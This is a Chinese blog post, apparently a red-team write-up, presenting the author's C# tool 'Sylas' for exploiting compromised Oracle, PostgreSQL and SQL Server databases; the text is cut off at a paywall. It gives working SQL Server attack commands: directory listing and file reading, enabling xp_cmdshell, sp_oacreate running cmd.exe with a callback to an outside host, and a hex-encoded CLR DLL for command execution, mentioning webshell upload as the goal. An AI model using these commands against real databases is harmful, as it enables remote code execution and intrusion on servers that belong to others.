数据库连接利用工具——Sylas | 红队攻防

最新推荐文章于 2024-09-24 21:18:52 发布
最新推荐文章于 2024-09-24 21:18:52 发布
阅读量1.5k 收藏 18
点赞数 22
CC 4.0 BY-SA版权
文章标签: oracle 数据库 安全架构 网络安全 系统安全 web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jijisaq/article/details/138647686

0x00 前言

起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如  tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功能出现问题,无法上传webshell,因此萌生了重写利用工具的想法。

大概耗时十天,顺带手把 postgresql 和 sql server 这两个护网中的常见数据库的利用也写了。

因为要做图形化,所以选择使用 C#

github地址:https://github.com/Ryze-T/Sylas

0x01 Sql Server

1.1 文件查看

目录查看

sql server 的目录查看比较简单,代码为:

sqlCmd.CommandText = String.Format("exec xp_dirtree '{0}',1,1",path);

第一个 1 指的是目录深度,只看查询文件夹下的,不再列出更深层次的目录,第二个 1 指的是将文件也列出来

图片

文件查看

文件查看用的是 openrowset(),在官方文档中有一句话,使用 BULK 可以从文件中读取数据,格式如下:

SELECT * FROM OPENROWSET(
   BULK 'C:\DATA\inv-2017-01-19.csv',
   SINGLE_CLOB) AS DATA;

这里有一个 SINGLE_CLOB,同样可选的选项还有 SINGLE_BLOB 和 SINGLE_NCLOB,三个的含义是读出的文件内容以 varcharvarbinary和 nvarchar 三种格式返回,在 C# 里常用的读取数据库查询返回结果的语句是

SqlDataReader reader = sqlCmd.ExecuteReader();
while (reader.Read())
{
    res = reader.GetString(0);
}

因此用 SINGLE_BLOB 可以满足 GetString()

图片

1.2 命令执行

命令执行的方法有这里使用了三种:xp_cmdshellsp_oacreateCLR

xp_cmdshell

老生常谈,最通用的方法。

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell 'whoami'

图片

sp_oacreate

无回显的方法,也是sqlmap中默认集成的方法之一:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c ping dnslog.cn'
CLR

Microsoft SQL Server 2005之后,微软实现了对 Microsoft .NET Framework 的公共语言运行时(CLR)的集成。
CLR 集成使得现在可以使用 .NET Framework 语言编写代码,从而能够在 SQL Server 上运行。

编写过程如下:

在 visual studio 中安装数据存储和处理工具集:

图片

新建 sql server 数据库项目:

图片

在项目属性中设置创建脚本文件:

图片

在其中编写代码后生成,在生成的文件夹下可以看到一个 sql 文件,打开后其中就有将该 dll 通过十六进制导入到 mssql 中的 sql 语句:

CREATE ASSEMBLY [execCmd]
    AUTHORIZATION [dbo]
    FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005045000064860200434309620000000000000000F00022200B023000000C000000040000000000000000000000200000000000800100000000200000000200000400000000000000060000000000000000600000000200000000000003006085000040000000000000400000000000000000100000000000002000000000000000000000100000000000000000000000000000000000000000400000A0020000000000000000000000000000000000000000000000000000342A00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000004800000000000000000000002E746578740000006C0B000000200000000C000000020000000000000000000000000000200000602E72737263000000A00200000040000000040000000E00000000000000000000000000004000004000000000000000000000000000000000000000000000000000000000000000000000000000000000480000000200050058220000DC07000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008A00280600000A7201000070721100007002280700000A28020000066F0800000A002A001B300600AF0100000100001173040000060A00730900000A0B076F0A00000A026F0B00000A0003280C00000A16FE010D092C0F00076F0A00000A036F0D00000A0000076F0A00000A176F0E00000A00076F0A00000A176F0F00000A00076F0A00000A166F1000000A00076F0A00000A176F1100000A00076F0A00000A176F1200000A0006731300000A7D010000040706FE0605000006731400000A6F1500000A00140C00076F1600000A26076F1700000A00076F1800000A6F1900000A0C076F1A00000A0000DE18130400280600000A11046F1B00000A6F0800000A0000DE00076F1C00000A16FE01130511052C1D00280600000A067B010000046F1D00000A6F0800000A0000389D00000000731300000A130608280C00000A16FE01130711072C0B001106086F1E00000A2600067B010000046F1F00000A16FE03130811082C15001106067B010000046F1D00000A6F1E00000A2600280600000A1C8D0E000001251602A2251703A22518721B000070A22519076F1C00000A13091209282000000AA2251A7253000070A2251B110
最低0.47元/天 解锁文章
cdb执行shellcode(免杀) | 红队攻防
jijisaq的博客
04-18 436
可以看到是在 notepad 进程中存在 tcp 连接,隐蔽性相对较高,且由于shellcode没明显特征,cdb 有签名,因此免杀效果很好。既然是调试工具,那就可以调试指定进程,且在指定进程里分配RWX属性内存并写入shellcode,最后执行该内存中的shellcode。shell.wds的生成是有固定格式的,首先使用 msf 生成 reverse_tcp 类型的 shellcode。
干货|红队渗透工具集(一)
weixin_46211944的博客
07-14 1209
功能包括域名ip历史解析、nmap常见端口爆破、子域名信息收集、旁站信息收集、whois信息收集、网站架构分析、cms解析、备案号信息收集、CDN信息解析、是否存在waf检测、后台寻找以及生成检测结果html报告表等。项目地址https//github.com/xzajyjs/ThunderSearch。项目地址https//github.com/r0eXpeR/redteam-tools。项目地址https//github.com/0x90/rdp-arsenal。支持查询用户个人信息。...
数据库连接利用工具Sylas
02-23
利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功能出现问题,无法上传webshell,因此萌生了重写利用工具的想法。
渗透工具Sylas数据库综合利用工具
学习、分享、交流
04-24 2103
渗透工具Sylas数据库综合利用工具
数据库利用工具-Sylas
SuperherRo的博客
08-16 173
数据库综合利用工具
通用数据库连接工具介绍
fengyeluan的专栏
09-30 697
sql explorer(不知道怎么装驱动) DBeaver(感觉不是很稳定) CoolSQL(不知道怎么装驱动) SqlBuddy(不知道怎么装驱动) Navicat Premium(比较推荐这个) 其实最好的还是用Navicat Premium,比较简单易用,但是太复杂的功能就没有了。
连接各种数据库工具
07-26
用于各类数据库,如sql、mysql、oracle等,而不用装很多东西。
红队攻防手册,红队攻防教程
04-20
红队攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御和应对这些攻击的团队。 ...
Linux无线网络渗透技术详解——无线网络红队攻防演练
# 1. 无线网络渗透简介 ## 1.1 无线网络渗透概述 在现代网络安全中,无线网络已经成为...在无线网络渗透测试中,渗透测试人员需要全面分析目标网络,识别潜在的安全漏洞,并利用相应工具和技术对其进行验证。 ## 1
一款可视化数据库链接工具
08-03
一款可以链接任何数据库的可视化工具,包括,sqlserver,mysql,access,db2,oracle,odata,odbc,dbase,foxprd,sqlce,sqlazure等等等等
探秘Sylas:一个强大的开源日志管理与分析工具
gitblog_00013的博客
04-18 630
探秘Sylas:一个强大的开源日志管理与分析工具 Sylas新一代子域名主/被动收集工具 - Subdomain automatic/passive collection tool项目地址:https://gitcode.com/gh_mirrors/sy/Sylas 项目简介 是由Acmesec开发的一个高效、灵活的日志管理和分析平台。它旨在帮助开发者和运维人员更轻松地处理日常的日志工作,无论...
2024HW|常见红队使用工具
Y_main的博客
05-28 2657
护网行动是国家公安部指导的一项旨在检测企事业单位的网络安全防护能力的活动。其实 HW 行动更像是网络安全红蓝对抗。通常来说网络安全训练分为红队和蓝队。红队代表攻击者,他们的任务是模拟恶意黑客或内部威胁,尝试入侵、渗透或绕过组织的网络安全措施。红队成员通常是经验丰富的安全专家,他们使用各种技术和方法来挑战组织的安全防御,以揭示潜在的漏洞和威胁。蓝队代表组织的网络防御团队,他们的任务是检测、响应和阻止红队的攻击。蓝队的工作类似于黑客,但是他们是经过授权和合法的。
英雄联盟新英雄Sylas(塞拉斯)的概念艺术设计
weixin_34112900的博客
03-21 929
随着我们最新发布的最新英雄Sylas以及对我们心爱的双胞胎姐妹二人组Kayle(天使)和Morgan(莫甘娜)的更新,2019年第一季度真的令人惊叹。今天,你会看到Sylas创造的幕后花絮,即Unshackled。在创造新的英雄时,我们的使命是为所有玩家带来不同的幻想类型。我们在发展过程中的目标是创造一个鼓舞人心的囚犯,适合目前在德马西亚失踪的更黑暗,更前卫的主题。Sylas...
数据库利用工具-Sylas,附下载链接。
最新发布
白帽子黑客SuperherRo
09-24 251
数据库综合利用工具
sqlserver数据库错误码
zsssszszs的博客
12-05 5137
sqlserver错误码大全,sqlserver错误码含错误消息号和说明
推荐这款免费的数据库管理工具,比Navicat还要好用,功能还很强大
m0_59117112的博客
03-14 2692
三个工作日收到了offer,头条面试体验还是很棒的,这次的头条面试好像每面技术都问了我算法,然后就是中间件、MySQL、Redis、Kafka、网络等等。第一个是算法关于算法,我觉得最好的是刷题,作死的刷的,多做多练习,加上自己的理解,还是比较容易拿下的。而且,我貌似是将《算法刷题LeetCode中文版》、《算法的乐趣》大概都过了一遍,尤其是这本。
数据库利用 看这篇就好了
moresec的博客
03-20 795
SELECT * FROM USER_TAB_COLUMNS WHERE regexp_like(column_name,'NAME|PHONE|MOBILE|CERTIFICATE|NUMBER|EMAIL|ADDR|CARD|电话|地址|身份证|姓名')[16进制的dll](https://github.com/SafeGroceryStore/MDUT/blob/main/MDAT-DEV/src/main/Plugins/Mssql/clr.txt)
数据库引擎错误
极客神殿
11-09 5511
该表包含错误消息编号和描述,它是sys.messages目录视图中错误消息的文本。 如果适用,错误编号是指向更多信息的链接。 此列表并不详尽。 有关所有错误的完整列表,请使用以下查询查询sys.messages目录视图: SELECT message_id AS Error, severity AS Severity, [Event Logged] = CASE is_event_logged WHEN 0 THEN 'No' ELSE 'Yes' END, text AS [Description]
探索数据库的利器:PowerUpSQL
gitblog_00018的博客
05-12 480
探索数据库的利器:PowerUpSQL 去发现同类优质开源项目:https://gitcode.com/ 1、项目介绍 在网络安全领域,有效的渗透测试和红队操作是保障企业安全的关键环节。【PowerUpSQL】是NETSPI公司推出的一款强大工具,专门针对SQL Server进行发现、弱点审计、权限提升以及后渗透利用。这款工具旨在帮助内部渗透测试者和红队成员更好地执行任务,同时也为管理员提供了快速...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吉吉说安全

感谢打赏,交个朋友!有困难找我

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值